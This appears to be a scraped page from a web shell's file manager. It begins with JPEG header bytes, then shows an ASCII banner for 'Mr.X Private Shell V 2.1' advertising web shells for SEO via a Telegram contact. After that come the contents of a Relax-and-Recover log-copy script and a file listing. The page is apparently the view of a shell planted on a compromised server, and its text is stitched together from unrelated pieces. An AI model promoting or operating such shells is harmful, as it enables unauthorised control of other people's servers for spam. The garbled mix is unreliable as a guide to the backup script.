����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# copy the restore log to restored system $TARGET_FS_ROOT/root/ with a timestamp
if ! test -d $TARGET_FS_ROOT/$ROOT_HOME_DIR ; then
mkdir -p $TARGET_FS_ROOT/$ROOT_HOME_DIR
chmod 0700 $TARGET_FS_ROOT/$ROOT_HOME_DIR
fi
cp "${TMP_DIR}/${BACKUP_PROG_ARCHIVE}-restore.log" $TARGET_FS_ROOT/$ROOT_HOME_DIR/restore-$(date +%Y%m%d.%H%M).log
StopIfError "Could not copy ${BACKUP_PROG_ARCHIVE}-restore.log to $TARGET_FS_ROOT/$ROOT_HOME_DIR"
gzip "$TARGET_FS_ROOT/$ROOT_HOME_DIR/restore-$(date +%Y%m%d.)*.log"
# the rear.log file will be copied later (by wrapup/default/990_copy_logfile.sh)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 200_remove_relative_rsync_option.sh | File | 845 B | 0644 |
|
| 400_restore_rsync_backup.sh | File | 3.18 KB | 0644 |
|
| 800_copy_restore_log.sh | File | 584 B | 0644 |
|